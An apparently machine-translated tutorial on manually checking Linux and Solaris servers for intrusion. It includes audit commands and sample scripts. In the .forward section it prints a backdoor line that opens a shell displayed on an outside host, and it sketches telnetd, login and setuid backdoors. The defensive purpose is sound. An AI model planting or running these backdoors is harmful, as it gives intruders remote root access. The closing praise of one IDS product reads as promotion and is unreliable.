How Linux determines if its server is compromised

Source: Internet
Author: User
Tags: syslog, system log, root access

How can you tell whether your server has been compromised? Manual checks alone are not enough, but they still have a role to play. We first look at some manual intrusion detection methods for UNIX systems, using Linux and Solaris as examples.

1. Check the system password file

First, start with the obvious: look at the passwd file. Run ls -l /etc/passwd and check the file's modification date.

Check which privileged users are in the passwd file; the following command prints every user with UID 0 (root privileges):

awk -F: '$3==0 {print $1}' /etc/passwd


Also check whether the system has any accounts with an empty password:

awk -F: 'length($2)==0 {print $1}' /etc/shadow
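The two checks above combined into one reusable audit (an added example, not part of the original article): it reports any UID 0 account other than root, any passwd entry that carries a hash instead of the shadow marker, and any shadow entry with an empty password. The sample passwd and shadow contents are constructed.

```shell
#!/bin/sh
# Account audit over a passwd file and a shadow file given as arguments, so it
# can run on /etc/passwd and /etc/shadow or on copies taken from a suspect host.
audit_accounts() {
    passwd_file=$1
    shadow_file=$2
    # A second UID 0 account is the usual sign of an added backdoor account.
    awk -F: '$3 == 0 && $1 != "root" { print "uid0: " $1 }' "$passwd_file"
    # A hash stored directly in passwd (anything but "x" or "*") bypasses shadow.
    awk -F: '$2 != "x" && $2 != "*" && $2 != "" { print "passwd-hash: " $1 }' "$passwd_file"
    # An empty second field in shadow means the account logs in without a password.
    awk -F: 'length($2) == 0 { print "nopass: " $1 }' "$shadow_file"
}

# Constructed sample files (not from a real system): "toor" is a second UID 0
# account and "guest" has no password; both should be reported.
workdir=$(mktemp -d)
cat > "$workdir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:backdoor:/tmp/.x:/bin/sh
guest:x:1001:1001:guest:/home/guest:/bin/sh
EOF
cat > "$workdir/shadow" <<'EOF'
root:$6$saltsalt$fakehash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
toor:$6$saltsalt$fakehash:19000:0:99999:7:::
guest::19000:0:99999:7:::
EOF

findings=$(audit_accounts "$workdir/passwd" "$workdir/shadow")
printf '%s\n' "$findings"
rm -rf "$workdir"
```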


2. Check the process to see if there are any strange processes

Focus on this process listing: ps -aef | grep inetd

inetd is the UNIX super-server daemon, and normally its PID appears near the top of the list. If you see output resembling inetd -s /tmp/.xxx, pay attention to what follows inetd -s. Normally the inetd service on a Linux system does not take an -s parameter and is never used to start a file, and on Solaris inetd runs only as inetd -s and likewise does not start a particular file. If ps shows inetd starting a file that you did not configure yourself, someone has broken into your system and planted a simple backdoor with root access.

Enter ps -aef and read the output, paying particular attention to any process whose command begins with ./xxx. Once a strange process has been detected, treat it as a possible intruder backdoor: run kill -9 PID immediately to kill the process, then run ps -aef again to see whether it is really gone. If such a process is killed and comes back, the system has been seeded with an automatic startup script. Now take a careful look: find / -name programname -print. If the system really does contain an intruder's backdoor, the directory in which the program is found will turn up a lot of interesting things.

Hidden processes under UNIX are sometimes produced by replacing the ps binary; detecting this requires checking file integrity, which we discuss later.

Next, follow the steps to locate the intruder's file directory on the server.

3. Check the system daemon processes

Check the /etc/inetd.conf file. Enter cat /etc/inetd.conf | grep -v '^#'; the output lists the remote services your machine has open.

A typical intruder creates a backdoor by directly replacing an in.xxx program, for example replacing in.telnetd with /bin/sh and restarting the inetd service; after that, every user who telnets to the server gets a root shell without entering a user name or password.

4. Check the network connection and listening port

Enter netstat -an to list all connections and listening ports on this machine and check for any illegitimate connections.

Enter netstat -rn to check that the routing and gateway settings are correct.

Enter ifconfig -a to view the network interface settings.

5. Check the System log

The command last | more shows the history of all users who have logged on to this computer. But the last command relies on the syslog process, which has become an important target for intruders. An intruder usually stops syslog on the system, so look at the syslog process and determine whether syslog was started properly at boot (syslog runs as root); if you find that syslog has been illegally stopped or moved, it indicates a serious intrusion.

Under Linux, enter ls -al /var/log

Under Solaris, enter ls -al /var/adm

Check whether the integrity and modification times of wtmp, utmp, messages and the other files are normal; editing these files by hand is one method of erasing intrusion traces.

6. Check the core files in the system

Attacking a server's service by sending it a malformed request is a regular intrusion method; the typical example is an RPC attack. This approach has a certain success rate, that is, it cannot guarantee a 100% successful intrusion, and it usually produces core files in the corresponding directory on the server. To search the whole system for core files, enter find / -name core -exec ls -l {} \; and judge whether there has been an intrusion from the directory in which each core resides and the core file found.

7. .rhosts and .forward

These are two of the better-known backdoor files. If you want to check whether an intruder has installed a backdoor on your system, search for these two files globally:

find / -name ".rhosts" -print

find / -name ".forward" -print

A .rhosts file in a user's $HOME containing only two plus signs (+ +) is very dangerous: if your system has port 513 open (the rlogin port, functionally the same as telnet), anyone can log on to your system as that user without any verification.

Placing commands in the .forward file is a common way of regaining access under a user's $HOME on UNIX. The .forward file may be set up as follows:

\username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

A variant of this method is to change the system's mail alias file (usually /etc/aliases). Note that this is only a simple transformation. A more advanced form runs a simple script from .forward that executes arbitrary commands taken from standard input (after a small amount of preprocessing). Using smrsh can effectively block this backdoor (although if you allow users to run programs such as Elm's filter or procmail, there is a good chance there is still a problem). Under Solaris, if you run the following command:

ln -s /var/mail/luser ~/.forward

and then set vacation, /var/mail/luser will be copied to ~/.forward with "|/usr/bin/vacation me" appended, and the old symlink is moved to ~/.forward.backup.

It is also possible simply to delete these two files.
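An added example (not from the original article) that scans a tree of home directories for the dangerous variants of the two files above: a .rhosts with wildcard + entries and a .forward that pipes mail to a command. The home directories and their contents are constructed for the demonstration.

```shell
#!/bin/sh
# Report .rhosts files that trust any host and .forward files that run a
# command; ordinary forwarding and host-specific .rhosts entries are skipped.
# Usage: scan_homes /home
scan_homes() {
    find "$1" -maxdepth 2 -type f \( -name .rhosts -o -name .forward \) 2>/dev/null |
    while read -r f; do
        case "$f" in
            */.rhosts)
                # A line "+", "+ +" or "+ user" trusts every host: rlogin/rsh needs no password.
                if grep -qE '^[[:space:]]*\+([[:space:]]+[^[:space:]]+)?[[:space:]]*$' "$f"; then
                    echo "rhosts-wildcard: $f"
                fi ;;
            */.forward)
                # A pipe entry runs a program for every delivered mail; review each one.
                if grep -q '|' "$f"; then
                    echo "forward-pipe: $f"
                fi ;;
        esac
    done
}

# Constructed home directories (not from a real system).
homes=$(mktemp -d)
for u in alice bob carol dave; do mkdir -p "$homes/$u"; done
printf '+ +\n' > "$homes/alice/.rhosts"                               # trusts everyone
printf 'trusted.example.test dave\n' > "$homes/dave/.rhosts"          # one named host
printf '\\bob, bob@mail.example.test\n' > "$homes/bob/.forward"       # plain forwarding
printf '\\carol|"/usr/bin/vacation carol"\n' > "$homes/carol/.forward" # pipe to a program

findings=$(scan_homes "$homes")
printf '%s\n' "$findings"
rm -rf "$homes"
```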

8. Check System file Integrity

There are several ways to check the integrity of a file. The usual one is to enter ls -l filename and compare the listing; this method is simple but still has some practical value. However, if the ls binary itself has been replaced, it becomes more troublesome. Under Linux you can use rpm -V `rpm -qf filename` and judge from the query output whether the file is intact (rpm -V reports each discrepancy it finds). There are many ways to use rpm to check file integrity under Linux, which will not be repeated here; man rpm gives the full set of options.

On UNIX systems, /bin/login is a file that intruders frequently replace with a backdoor. The login backdoor works as follows:

On UNIX, the login program is typically used to authenticate users arriving via telnet. The intruder obtains the source code of login and modifies it so that, when comparing the entered password with the stored one, it also checks for a backdoor password. If a user enters the backdoor password, the password set by the administrator is ignored and the user is let in. This allows the intruder to enter any account, even root. Because the backdoor password grants access before the login is recorded in utmp and wtmp, the intruder can log in and get a shell without the account being exposed. When the administrator notices this backdoor, the strings command can be used to search the login program for text; in many cases the backdoor password will appear in plain text. Intruders then started encrypting or hiding the password to defeat the strings command, so many administrators use MD5 checksums to detect this backdoor. UNIX systems have the md5sum command; enter md5sum filename to compute the MD5 checksum of a file. Its options: md5sum -b reads the file in binary mode, md5sum -c checks files against recorded MD5 checksums, and md5sum -t reads the file in text mode.

As mentioned above, services that are not commented out in the daemon configuration file inetd.conf are active. As a simple example, if you have the telnet service open, the configuration file will contain a line such as: telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

You can see that the file it uses is /usr/sbin/in.telnetd; check the integrity of that file, because intruders often create a backdoor by replacing the service programs enabled in the daemon configuration.
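An added example (not from the original article) that ties the inetd.conf check to the md5sum integrity check: it extracts the server programs enabled in inetd.conf, records their checksums in a baseline, and later verifies them with md5sum -c, flagging a replaced in.telnetd. The inetd.conf and the daemon files are constructed placeholders in a temporary directory.

```shell
#!/bin/sh
# inetd.conf fields: service socket-type protocol wait/nowait user server-program args
# Field 6 is the program inetd executes, so that is the file to baseline.

# List every server program path from the uncommented lines (skips "internal" services).
inetd_servers() {
    grep -v '^[[:space:]]*#' "$1" | awk 'NF >= 6 && $6 != "internal" { print $6 }' | sort -u
}

# Record "md5  path" for each listed program; keep this baseline off the host.
make_baseline() {
    inetd_servers "$1" | while read -r prog; do
        [ -f "$prog" ] && md5sum "$prog"
    done > "$2"
}

# Re-check the recorded files; echoes 0 when all match, 1 when any file changed.
verify_baseline() {
    if md5sum -c "$1" >/dev/null 2>&1; then echo 0; else echo 1; fi
}

# Constructed sample tree (not a real system): two placeholder daemons and a
# small inetd.conf pointing at them, plus a commented-out and an internal service.
workdir=$(mktemp -d)
mkdir "$workdir/sbin"
echo "placeholder in.telnetd" > "$workdir/sbin/in.telnetd"
echo "placeholder in.ftpd" > "$workdir/sbin/in.ftpd"
cat > "$workdir/inetd.conf" <<EOF
# finger stream tcp nowait nobody $workdir/sbin/in.fingerd in.fingerd
echo   stream tcp nowait root internal
telnet stream tcp nowait root $workdir/sbin/in.telnetd in.telnetd
ftp    stream tcp nowait root $workdir/sbin/in.ftpd in.ftpd -l
EOF

nservers=$(inetd_servers "$workdir/inetd.conf" | grep -c .)   # 2 enabled programs
make_baseline "$workdir/inetd.conf" "$workdir/baseline.md5"
before=$(verify_baseline "$workdir/baseline.md5")              # 0: everything matches

# Simulate the replacement described above: in.telnetd is overwritten.
echo "something else" > "$workdir/sbin/in.telnetd"
after=$(verify_baseline "$workdir/baseline.md5")               # 1: in.telnetd changed
echo "servers=$nservers before=$before after=$after"
rm -rf "$workdir"
```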

On Linux, /etc/crontab is also a file often exploited by intruders. To check its integrity you can simply cat /etc/crontab and read the file carefully to see whether an intruder has used it to run something else.

Starting a backdoor as a process, without replacing a file such as login, has a flaw: once the system restarts, the process is gone, so the backdoor must be started when the system boots. Usually you check the files under /etc/rc.d to see whether the system starts a backdoor at boot. This method is rather like checking for Trojans under Windows, isn't it?

While on this subject: if a file in some directory has attributes like -rwsr-xr-x 1 root root xxx.sh, any user who logs in and runs this file gets a root shell; this is a setuid file. Run find / -perm -4000 -print to search the whole system for such files, then delete any you did not install (standard setuid programs such as passwd and su are expected to appear in the list).

9. Check for kernel-level backdoors

If this kind of backdoor has been installed on your system, it is usually more troublesome; I often think that in this case you may as well reinstall the system. To get to the bottom of it, first check the loaded kernel modules: use the lsmod command on Linux and the modinfo command on Solaris. Note that a default Linux installation loads relatively few modules, usually just the network card driver, whereas Solaris loads many; there is no other way but to analyse them one by one. After hardening the kernel you should prohibit inserting and removing modules to protect the system, otherwise the intruder may replace system calls again; this can be achieved by replacing create_module() and delete_module(). The kernel should also be hardened as early as possible, in case system calls have already been replaced by the intruder. If a backdoor module is loaded but does not appear in the module list in /proc/modules, a hacking tool may have been used to hide the loaded module; the well-known Knark toolkit includes a tool for hiding loaded modules. In that case you need to look closely at the /proc directory and work out, from the files found and from experience, which processes are hidden and disguised. The Knark backdoor module uses the /proc/knark directory, and of course this directory is hidden.

10. The shortcomings of manual intrusion detection

The methods above are manual intrusion detection, but they have certain flaws, some of them unavoidable, which is why manual detection is "manual labour". Let's look at these flaws first:

1) Manual intrusion detection can only be host-based, which means all detection work can only be done within the operating system; this is its inherent flaw, and basically all intrusions beyond the operating system are undetectable. Network-level intrusions and attacks on switches and routers are unknown to the server's operating system: once the information has left the host, if the transmission medium is intercepted, the host's operating system remains oblivious.

2) Manual intrusion detection requires proficiency with the operating system, and vulnerability databases are refreshed quickly; the administrator has to be a hacker at the same time as a network manager. It can be said that accumulated experience will never keep up with the updating of the world's vulnerability data, so the system is not protected against new vulnerabilities.

3) Manual intrusion detection is purely after the fact: it judges an intrusion from a situation that has already occurred and then takes the corresponding countermeasures and precautions. It cannot, based on the intruder's reconnaissance behaviour, describe the attack event in advance, define its severity level, and prevent the next intrusion while the system keeps working normally.

4) Manual intrusion detection can find some vulnerabilities on the host and lead to corresponding security measures. But it cannot prevent a second intruder from exploiting the same vulnerability against the host, that is, it cannot identify the attack pattern and cut off the intrusion.

5) In summary, manual intrusion detection treats the symptoms of system security rather than the cause; it relies mostly on the skills and experience of the administrator to improve security and cannot form a real security system. Although it is better than nothing and can detect and trace certain intrusions, it is hard to catch a trace when the intruder is equally familiar with the system.

11. Comparison of intrusion detection systems

Building a real security system requires an intrusion detection system (IDS). An excellent IDS combined with the skills and experience of the system administrator can form a real security system, effectively judging and cutting off intrusions and truly protecting the host and its data. People sometimes think that ISS RealSecure is an excellent IDS; in fact RealSecure has certain defects. Leaving aside its false positives, false negatives and misreports, it is first of all English-language software, which makes it somewhat difficult to use and become familiar with. And because it is foreign software, many hackers have studied RealSecure in depth and uncovered some of its vulnerabilities, even inherent ones; I have tested some attack techniques that can paralyse RealSecure. Moreover, RealSecure is installed on the server's operating system, so when the operating system stops working it stops too; put simply, the attacker's target is often RealSecure itself. Imagine that your system relies on an intrusion detection system and the attackers take it out: your system's door is left wide open, and the consequences are unimaginable.

A fully Chinese intrusion detection system is of course rather appealing; the Tian Khotan detection engine is a typical one. It has its own "black box": when an intruder attacks a server, it is almost impossible to discover that the server is running the Tian Khotan detection engine, which greatly increases the difficulty of the attack and improves the security of the server.
